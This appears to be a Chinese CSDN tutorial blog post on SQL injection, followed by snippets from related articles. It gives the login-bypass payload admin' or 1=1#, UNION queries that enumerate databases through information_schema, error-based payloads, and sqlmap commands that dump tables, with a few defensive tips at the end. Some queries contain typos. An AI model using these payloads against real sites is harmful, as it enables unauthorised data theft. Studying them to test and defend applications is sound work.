WEB漏洞之SQL注入

最新推荐文章于 2022-04-20 23:29:21 发布
最新推荐文章于 2022-04-20 23:29:21 发布
阅读量382 收藏
点赞数
分类专栏: 安全 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj193165zl/article/details/96461199
版权

SQL注入的简单例子:

使用URL:http://localhost/a.php?id=1'

在程序中,会执行下面的语句:

$id=$_GET['id'];

$sql="SELECT * FROM user WHERE id=$id' LIMIT 0,1"

执行上面的这条语句就会报错,这里如果不对URL进行判断,那么这就会导致语句的执行错误,严重的,别人就可以获取到想要的数据信息。

如何去发现SQL注入:

  1. 通过web漏洞扫描器发现
  2. 在参数后面添加错误语句
  3. 大量的对参数Fuzz测试

注入的分类

  1. 数字型注入:SELECT * FROM users WHERE id=$id LIMIT 0,1;
  2. 字符型注入:SELECT * FROM users WHERE username='admin' LIMIT 0,1;
  3. 注入提交的方式:GET,POST ,COOKIE,HTTP头部注入

注入方式

  1. 基于报错注入:注入错误,通过报错获取信息。
  2. 基于布尔的盲注
  3. 基于时间的盲注
  4. 联合查询
  5. 内联查询
  6. 堆叠的查询

常用的方式是前四种。

SQL手工注入

万能密码:PHP项目下,通过注入以下形式的sql,就能直接登陆到后台网站,而不需要密码:

admin ' or 1=1#

结合下面的SQL登陆判断

select * from user where username='$user' and passwd='$pass';

通过提交上面的字符,程序执行就会像下面这样:

select * from user where username ='admin' or 1=1 #' and password='pass';   //这样,#号后面的语句就会被注释掉,这样就绕过了程序对用户的判断。而直接以admin用户登陆

SQL注入的流程

  1. 猜解字段
  2. 查看当前数据库   ——>  猜解数据库中的表——>猜解数据库中有哪些字段
  3. Union select 1,group_concat(schema_name),3 from information_scheema.schemate%23    //查询所有数据库
  4. union select 1,group_concat(table_name),3 from information from information_schema.tables where  table_schema=0x736563757269749%23 //查询数据库中的表

UNION SELECT 1,GROUP_CONCAT(column_name),3 FROM information_schema.columns where table_name=0x736563757269749%23     //查看当前数据库中有哪些字段。

sqlmap工具的学习

官网:http://sqlmap.org/,我们可以使用扫描器,扫描出已有的SQL注入漏洞,然后再使用该工具进行测试该漏洞。

该工具用于测试业务是否有sql注入的漏洞。

使用方法:

python sqlmap.py -u "http://your url"  -v 3

-v 3表示的是sql注入的级别。为1~6,数字越大,代表了注入的时候,显示的信息越详细。

python sqlmap.py -u "http://your url"  -v 3 --current-db    //用于查看当前数据库的名称

python sqlmap.py -u "http://your url"  -v 3 --current-users   //当前数据库使用的用户和权限

python sqlmap.py -u "http://your url"  -v 3 --tables -D 数据库名   //查看当前数据库中有哪些表

python sqlmap.py -u "http://your url"  -v 3 --column -T 表名  -D 数据库名    //查看指定表下有哪些字段

python sqlmap.py -u "http://your url"  -v 3 --dump   -T 表名 -D 数据库名   //查看该表下有哪些数据。

上面的方式为GET注入的方式,下面记录以POST的方式,借助sqlmap进行注入:

借助于burpsuite,进行抓包,将抓取到的东西,保存至文档中1.txt,使用sqlmap分析该文档

python sqlmap.py -r 1.txt -v3

这样就可以对该网站进行post注入测试了。

如何防护SQL注入呢:

  1. CDN隐藏真是IP地址
  2. 通过安全函数进行过滤
  3. 对数据库最小权限设置,就算注入获取到该网站的数据库,其它的数据库也会很安全。
  4. 服务器针对性的WAF防火墙。
wj193165zl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php下巧用select语句实现mysql分页查询
09-11
mysql分页查询是我们经常见到的问题,那么应该如何实现呢?下面就教您一个实现mysql分页查询的好方法,供您参考学习。
Web安全--SQL注入
bobo_milk的博客
11-10 530
floor():id=1' and (select 1 from (select count(*),concat(操作代码,floor(rand(0)*2))x from information_schema.tables group by x)a) --+extractvalue():id=1' union select 1,(extractvalue(1,concat(0x7e,(select 操作代码)))) --+最快的办法就是使用工具跑,可以使用bp的intruder进行爆破字符。
MySQL查询优化:LIMIT 1避免全表扫描
移动编程
03-27 1106
在某些情况下,如果明知道查询结果只有一个,SQL语句中使用LIMIT 1会提高查询效率。 例如下面的用户表(主键id,邮箱,密码): create table t_user( id int primary key auto_increment, email varchar(255), password varchar(255) ); 每个用户的email是唯一的,如果用户使用em...
[理论-学习]Web安全-SQL注入-基础01
3hex的博客
08-15 200
一、SQL的介绍 1. SQL(Structured Query Language)即结构化查询语言。最早使用在System R中,后来逐渐推广为一个规范。 2. SQL的分类: DQL(Query):Select DML(Manual):Insert,Update,Delete DDL(Define):Create,Drop,Alert DCL(Control):rant,Revoke,Commit 二、SQL注入基础 1...
Mybatis的多表操作
无区新手的博客
07-17 291
heima老师整理 Mybatis多表查询 一对一查询 一对一查询的模型MapperScannerConfigurer 用户表和订单表的关系为,一个用户有多个订单,一个订单只从属于一个用户 一对一查询的需求:查询一个订单,与此同时查询出该订单所属的用户 一对一查询的语句 对应的sql语句:select * from orders o,user u where o.uid=u.id; 查询的结果如下: 创建Order和User实体 public class Order ...
sqli-liabs学习SQL注入之旅(第一关~第十关)
guanjian_ci的博客
04-20 3882
第一关 第一步:判断参数的类型 ?id=1' 页面报错 ?id=1' --+ 页面正常 判断参数接受类型为 字符型 查看第一关源码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 证明我们的判断正确! 第二步:猜解字段 ?id=1' order by 3 --+ 页面正常 ?id=1' order by 4 --+ 页面报错 判断字段长度为 3 第三步:爆数据库名 ?id=-
7-Web安全——SQL注入WAF绕过之注释符号
网络安全
05-31 4491
SQL注入过程中注释符号有以下几种表达方式: -- # %23 SQL注入过程中注释符号的作用是把后面不需要的语句注释掉,以保证SQL命令的完整性。 以Less-1为例,分析源代码: $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 在进行注入时,输入?id=1,参数传入到后台中输入的值1会替换$id,源代码中闭合值就是这样的: $sql="SELECT * FROM users WHERE id='1'...
通过两道CTF题学习过滤单引号的SQL注入
热门推荐
Lethe's Blog
03-24 1万+
0x00 前言 通常来说,在进行字符型的SQL注入时,都需要先将前面的引号等(以单引号为例)进行闭合才能执行我们构造的SQL语句,那么如果单引号被过滤了,是否还能够成功的SQL注入呢? 答案是可以,当你在判断登录时使用的是如下SQL语句: select user from user where user='$_POST[username]' and password='$_POST[passwor...
PHP中查询sql语句
weixin_43786904的博客
01-09 2964
1:sql查询语句 描述:表示去数据库中指定的表内根据条件查询指定的内容。 语法:$sql = “select [信息] from [哪张表] where [查询条件]”; 说明: [信息]有两种写法: 一是 写* 星号,代表查询所有字段对应的信息 $sql = "select * from friendslist where 1 "; 二是写指定字段,代表查询某个字段对应信息,如果有多个用多好隔...
php的$sql,PHP里的sql有关问题
weixin_39910043的博客
04-06 264
PHP里的sql问题//查询$sql="SELECT*FROM`rv_duifu`where1=1$searchorderbyiddescLIMIT$pageNum,$numPerPage";$db->query($sql);$list=$db->fetchAll();//echo$sql;//格式化输出数据foreach($listas$key=>...
数据库手工注入中的闭合
菜鸟-传奇
08-21 1274
1、什么是闭合? 闭合:这个语句可以完整正确的执行 后台服务器PHP代码: $sql = "SELECT * FROM users WHERE id = $id LIMIT 0,1"; $sql = "SELECT * FROM users WHERE id = '$id' LIMIT 0,1"; $sql = "SELECT * FROM users...
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
02-26
本文主要关注SQL注入,假设读者已经了解一般的SQL注入技术,在我之前的文章中有过介绍,即通过输入不同的参数,等待服务器的反应,之后通过不同的前缀和后缀(suffixandprefix)注入到数据库。本文将更进一步,讨论SQL盲注,如果读者没有任何相关知识储备,建议先去wikipedia学习一下。在继续之前需要提醒一下,如果读者也想要按本文的步骤进行,需要在NOWASPMutillidae环境搭建好之后先注册一个NOWASPMutillidae帐号。本文演示从web界面注入SQL命令的方法,但不会直接连接到数据库,而是想办法使后端数据库处理程序将我们的查询语句当作SQL命令去执行。本文先描述一
WEB漏洞学习-sql注入
最新发布
06-11
之前文章中的导图文件,由于个人的在线时间导致大家获取困难,现在放在这里供大家自行取用。
第14天:WEB漏洞-SQL注入之类型及提交注入1
08-03
#简要明确参数类型数字,字符,搜索,JSON 等#简要明确请求方法GET,POST,COOKIE,REQUEST,HTTP 头等其中 SQL 语句干扰符号:',
SQL注入漏洞全接触
03-03
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。 但是,SQL注入
SQL注入漏洞演示源代码
09-13
SQL注入漏洞演示源代码 更多免费资源请查看:http://download.csdn.net/user/php_fly
网站文件泄露——git,svn,DS_Store,网站备份
wj193165zl的博客
07-23 7304
常规的文件泄露包含了下面的几种形式: Github git svn .DS_Store .hg .bzr cvs 上面的七种为版本管理工具所泄露的常规方式 WEB-INF 网站备份,zip,sql,rar,swp,phpinfo:是指在网站目录存在这些备份文件 上面的两种方式为操作不当,安全意识薄弱所造成的泄露。 github泄露:开发人员将代码上传到网站,在上传的时候,没有删...
应急响应流程
wj193165zl的博客
08-11 6130
应急响应PDCERF模型: P(PreParation准备) D(Detection诊断) C(Containment抑制) E(Eradication根除) R(Recovery恢复) F(follow-up跟踪) 在发现服务器入侵的时候,我们需要使用以上的流程进行排查: PreParation准备:如果系统被入侵了,一般不建议采用系统自带的应用工具(ls,ifconfig,ps,...
zabbix安全漏洞和防范方法
wj193165zl的博客
08-15 3127
zabbix的安全一般分为以下的几种: 1,zabbix配置不当导致的安全事件 zabbix服务端的权限非常高,很多黑客可以通过zabbix的服务端对被监控服务器进行渗透攻击,所以,zabbix在安装后,必须修改zabbix的默认用户名和密码,就算将zabbix放到内网中,也不能保证zabbix的绝对安全。 2,zabbix弱口令密码,容易被爆破 3,zabbix低版本的注入漏洞,通过该注...
pikachu漏洞平台sql注入攻略
05-11
首先,要了解什么是SQL注入攻击,它是一种利用Web应用程序中存在的安全漏洞,通过将恶意的SQL语句插入到数据输入字段中,从而达到欺骗数据库执行恶意SQL语句的目的。 接下来,我们可以通过以下步骤进行Pikachu漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值